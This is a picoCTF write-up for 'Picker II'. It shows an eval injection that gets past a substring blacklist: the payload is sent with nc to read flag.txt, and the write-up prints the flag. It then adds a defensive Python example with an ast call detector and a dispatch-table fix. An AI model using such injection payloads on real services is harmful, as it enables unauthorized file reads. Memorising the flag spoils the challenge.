Picker II

Published: March 5, 2024
Updated: December 9, 2025

Description

Picker II adds a simple blacklist so you cannot type win directly, but eval still executes arbitrary Python expressions. Abuse the file read inside win() yourself.

Python sandbox bypass

Download picker-II.py

Review picker-II.py to see the string blacklist that prevents submitting win.

Look at the win() helper; the first line reads flag.txt, and nothing stops you from doing the same.

wget https://artifacts.picoctf.net/c/523/picker-II.py
cat picker-II.py

Solution

  1. Step 1: Copy the critical line
    Inside win(), the statement flag = open('flag.txt', 'r').read() loads the flag. Because user input still flows into eval, you can perform the same file read yourself and print its result.
  2. Step 2: Submit the payload remotely
    Connect to the remote host and paste print(open('flag.txt', 'r').read()). The service executes your code server-side and prints the flag.
    printf "print(open('flag.txt','r').read())\n" | nc saturn.picoctf.net 56771

Flag

picoCTF{f1l73r5_f41l_c0d3_r3f4c70r_m1gh7_5ucc3...44590}

Because the blacklist only checks for win, any other Python code that reads flag.txt still succeeds.
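To make the weakness concrete from the defender's side, here is an added Python example (not the challenge's picker-II.py, which is not reproduced on this page). It models the substring blacklist in front of eval(), adds a small ast-based check that flags menu input containing any function call, and shows the fix: a fixed dispatch table that never evaluates user input at all. FLAG, BLACKLIST, the menu handlers and the sample inputs are constructed for the example.

```python
import ast

# Constructed model of the Picker II pattern: a substring blacklist guarding
# eval(), beside a dispatch-table design that removes eval() entirely.
# Added example; not the challenge's own code.

FLAG = "picoCTF{placeholder_flag}"  # placeholder, not the challenge's flag file
BLACKLIST = ("win",)                 # the only token the challenge filter blocks


def win() -> str:
    """Privileged helper the menu never offers (stands in for the flag read)."""
    return FLAG


def blacklist_allows(user_input: str) -> bool:
    """Model of the challenge filter: True when eval() would still run the input."""
    return not any(bad in user_input for bad in BLACKLIST)


def contains_call(user_input: str) -> bool:
    """Detection aid: True if the input parses as an expression containing a call.

    A legitimate menu selection never needs a call, so any hit is worth logging
    regardless of which names the blacklist happens to cover.
    """
    try:
        tree = ast.parse(user_input.strip(), mode="eval")
    except SyntaxError:
        return False
    return any(isinstance(node, ast.Call) for node in ast.walk(tree))


def choice_one() -> str:
    return "you chose one"


def choice_two() -> str:
    return "you chose two"


# Hardened design: the only reachable handlers are the ones listed here,
# and win() is deliberately absent. No string is ever evaluated.
MENU = {"1": choice_one, "2": choice_two}


def run_menu_choice(user_input: str) -> str:
    """Look the input up in a fixed table instead of evaluating it."""
    handler = MENU.get(user_input.strip())
    if handler is None:
        return "invalid choice"
    return handler()


if __name__ == "__main__":
    # Constructed inputs: a normal choice, the blocked token, and the bypass from this writeup.
    for sample in ("1", "win()", "print(open('flag.txt','r').read())"):
        print(f"{sample!r}: blacklist_allows={blacklist_allows(sample)}, "
              f"contains_call={contains_call(sample)}, "
              f"menu={run_menu_choice(sample)!r}")
```

Running it shows the three outcomes side by side: the blacklist stops win() but waves the file-read payload through, contains_call flags both, and the dispatch table rejects anything that is not a listed menu key.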